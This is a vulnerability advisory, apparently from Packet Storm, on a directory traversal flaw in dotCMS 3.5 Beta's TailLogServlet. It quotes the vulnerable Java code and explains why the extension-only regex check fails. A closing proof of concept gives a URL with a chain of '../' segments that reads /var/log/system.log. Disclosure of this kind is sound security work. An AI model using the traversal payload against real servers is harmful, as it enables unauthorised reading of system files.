DotCMS version 3.5 Beta suffers from a directory traversal vulnerability.
1fad220bd9b74144259838fdc1996fc91aa92055bf12ec9962731c4a8aa8c02dAdvisory: DotCMS Directory traversal vulnerability
Author: Piaox From Pingan Product Safety Group
Email: xiongyaofu351@pingan.com.cn
Affected Version: dotCMS 3.5 Beta(the latest version)
==========================
Vulnerability Description
Recetly, I found a Directory traversal vulnerability in ‘DotCMS'
program, DotCMS is widely used in many companies.
Vulnerable file is: “com.dotmarketing.servlets.taillog.TailLogServlet.class”
File file = *null*;
String tailLogLofFolder = *Config*.*getStringProperty*(
"TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/");
*try*
{
*if* (!tailLogLofFolder.endsWith(File.separator)) {
tailLogLofFolder = tailLogLofFolder + File.separator;
}
file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder +
fileName));
}
*catch* (Exception e)
{
*Logger*.*error*(getClass(), "unable to open log file '" +
tailLogLofFolder + fileName + "' please set the config variable
TAIL_LOG_LOG_FOLDER correctly");
}
*if* ((file == *null*) || (!file.exists()))
{
response.sendError(403);
*AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone
tried to use the TailLogServlet to display a file not in the logs directory"
);
*return*;
}
String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX");
//WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$
*if* (!*UtilMethods*.*isSet*(regex)) {
regex = "!.*";
}
*if* (!Pattern.compile(regex).matcher(fileName).matches()) {
//Only detects whether the file extension .log end,lead ,caused Directory
traversal vulnerability.
*return*;
}
response.setContentType("text/html;charset=UTF-8");
ServletOutputStream out = response.getOutputStream();
out.print("<html><head><title>dotCMS Log</title><style
type='text/css'>@import '/html/css/dot_admin.css';</style><script>var
working =false;function
doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body
class='tailerBody'>");
out.flush();
*Tailer* tailer = *null*;
*long* startPosition = file.length() - 5000L < 0L ? 0L : file.length()
- 5000L;
*MyTailerListener* listener = *new* MyTailerListener(*null*);
listener.*handle*("Tailing " + fileName);
listener.*handle*("----------------------------- ");
tailer = *new* *Tailer*(file, listener, 1000L);
tailer.*setStartPosition*(startPosition);
*MyTailerThread* thread = *new* *MyTailerThread*(tailer);
String name = *null*;
*for* (*int* i = 0; i < 1000; i++)
{
name = "LogTailer" + i + ":" + fileName;
Thread t = *ThreadUtils*.*getThread*(name);
*if* (t == *null*) {
*break*;
}
*if* (i > 100) {
*throw* *new* ServletException("Too many Logger threads");
}
}
==========================
POC && EXP
==========================
1. Login
2.
http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed